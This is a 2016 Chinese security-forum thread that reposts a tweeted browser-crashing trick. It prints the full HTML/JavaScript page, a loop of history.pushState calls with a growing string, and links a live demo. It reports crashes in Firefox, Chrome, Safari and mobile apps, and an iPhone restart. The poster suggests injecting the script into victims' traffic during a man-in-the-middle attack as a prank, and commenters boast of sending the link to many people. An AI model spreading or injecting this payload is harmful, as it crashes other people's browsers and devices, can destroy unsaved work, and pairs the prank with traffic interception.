高级模式   | 热搜 : 资讯  安全  漏洞  工具  系统安全 
查看: 1373 | 回复: 2
只看楼主
离线
Mersion(好ID:4666701)   发表于 2016-01-21 00:27:50     
1#

起因

今天刷推特的时候发现Cyber Security@cyber__sec的推文让人眼前一亮:

Crash firefox, chrome, safari browsers, and also restart iphone using this javascript code. #dos #0day #exploit

//使用下面这段JavaScript代码能让firefox,chrome,safari浏览器崩溃,而且还能让iphone重启。

继续在推特上深挖发现IT Security Tweets ™ @F1r3h4nd 于17日发推:

Crash your friend's browser and restart Iphone with a link which has this script: #0day//把带有下面这个脚本的链接发给你的朋友,能让你朋友的浏览器崩溃,而且让Iphone重启。



完整HTML代码如下:

<html>

<body>

<script>

var total="";

for (var i=0;i<1000000;i++)

{

    total= total+i.toString();

    history.pushState(0,0,total);

}

</script>

</body>

</html>

demo:(温馨提示:请保存浏览器其它窗口的编辑任务)

www.0xroot.cn/demo.html (点击一下,又不会怀孕!)

接来下会发生什么?

点开以后,我的状态是这样的:

如果你是PC端用户,点开链接以后,电脑CPU内存极有可能一路狂飙直至浏览器崩溃卡死!

如果你是移动端(安卓、iPhone)用户,点开链接以后你的浏览器会闪退!在微博、微信客户端点开链接同样会闪退。至于在推文中提到的让iPhone重启,这一现象倒是没有出现。22:49 修正:iPhone用Safari打开之后链接之后,手机注销重启了!…

思考

这是Bug还是0day?为什么会有这一现象?如何实现的?

有哪些比较有意思的利用姿势?(我先来个:当在执行MITM中间人攻击的时候,可以注入这一段js,来个恶搞整蛊。然后都懂的…)

欢迎大家在评论中发表自己的观点   

微博评论/讨论摘取

怀孕了...

好有趣...

好可怕...

整蛊不错

我已祸害了好多人(卖萌脸(づ ̄ 3 ̄)づ)

崩溃了

火狐假死10秒后弹窗提示脚本无响应可停止难道是history的栈溢出么?

可以可以,新姿势get√

JS是世界上最好的语言!

hist.pushState是干嘛用的?

电脑正在重启

不能只让我一个人中招

我为什么会手贱?

Chrome隐身模式没有问题啊

*作者/雪碧,转载须注明来自OFTEFS - SOSF (VCCCC.CN)

赞 0
    最近浏览:

huller1
2017-08-30

墨齾
2016-06-16

yfmxo
2016-02-16

联盟
2016-02-01

3066495114
2016-01-29

Machine
2016-01-29

Mersion
2016-01-27

未央945
2016-01-21

2161485003
2016-01-20
 
 
Mersion社区版权声明1、本主题所有言论和图片纯属会员个人意见,与本论坛立场无关。
2、本站所有主题由该帖子发布者发表,该帖子作者发布者享有帖子相关版权。
3、其他单位或个人使用、转载或引用本文时必须同时征得该帖子作者的同意。
4、帖子作者与发布者须承担一切因本文发表而直接或间接导致的民事或刑事法律责任。
5、本帖部分内容转载自其它媒体,但并不代表本站赞同其观点和对其真实性负责。
6、如本帖侵犯到任何版权问题,请立即告知本站,本站将及时予与删除并致以最深的歉意。
7、文字管理员和版主有权不事先通知发贴者而删除本文。
 
离线
未央945(好ID:6690897)   发表于 2016-01-21 00:46:07     
2#
我要吐槽:目测用360浏览器访问什么事都没有。
 
离线
未央945(好ID:6690897)   发表于 2016-01-21 13:06:10     
3#
QQ访问会闪退……
 
你需要登录入才可以回帖  登入  |  会员注册

备案号: 版权所有:Mersion社区
当前时间:UTC+8:00, 2019-06-26 02:23:43